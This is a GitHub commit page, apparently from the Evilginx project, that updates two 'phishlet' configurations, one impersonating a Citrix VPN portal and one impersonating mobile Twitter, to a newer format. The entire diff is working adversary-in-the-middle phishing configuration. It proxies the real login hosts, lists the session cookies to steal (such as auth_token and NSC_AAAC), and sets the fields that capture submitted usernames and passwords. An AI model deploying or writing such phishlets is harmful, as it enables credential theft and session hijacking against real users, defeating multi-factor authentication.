Skip to content

Commit 9c55f08

Browse files
kgretzkykgretzky
committed
updated remaining phishlets to 2.2.0
1 parent edc715e commit 9c55f08

File tree

2 files changed

+24
-19
lines changed

2 files changed

+24
-19
lines changed

phishlets/citrix.yaml

Lines changed: 11 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,18 +1,21 @@
11
name: 'Citrix Portal'
22
author: '@424f424f'
3-
min_ver: '2.1.0'
3+
min_ver: '2.2.0'
44
proxy_hosts:
55
- {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
66
sub_filters:
7-
- {hostname: 'domainhere', sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
7+
- {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
88
auth_tokens:
99
- domain: 'domainhere'
1010
keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
11-
user_regex:
12-
key: 'login'
13-
re: '(.*)'
14-
pass_regex:
15-
key: 'passwd'
16-
re: '(.*)'
11+
credentials:
12+
username:
13+
key: 'login'
14+
search: '(.*)'
15+
type: 'post'
16+
password:
17+
key: 'passwd'
18+
search: '(.*)'
19+
type: 'post'
1720
landing_path:
1821
- '/vpn/index.html'

phishlets/twitter-mobile.yaml

Lines changed: 13 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,22 +1,24 @@
1-
name: 'twitter-mobile'
21
author: '@white_fi'
3-
min_ver: '2.0.0'
2+
min_ver: '2.2.0'
43
proxy_hosts:
54
- {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
65
- {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
76
- {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
87
sub_filters:
9-
- {hostname: 'mobile.twitter.com', sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
10-
- {hostname: 'abs.twimg.com', sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
11-
- {hostname: 'api.twitter.com', sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
8+
- {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
9+
- {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
10+
- {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
1211
auth_tokens:
1312
- domain: 'twitter.com'
1413
keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
15-
user_regex:
16-
key: 'session[username_or_email]'
17-
re: '(.*)'
18-
pass_regex:
19-
key: 'session[password]'
20-
re: '(.*)'
14+
credentials:
15+
username:
16+
key: 'session\[username_or_email\]'
17+
search: '(.*)'
18+
type: 'post'
19+
password:
20+
key: 'session\[password\]'
21+
search: '(.*)'
22+
type: 'post'
2123
landing_path:
2224
- '/login'

0 commit comments

Comments
 (0)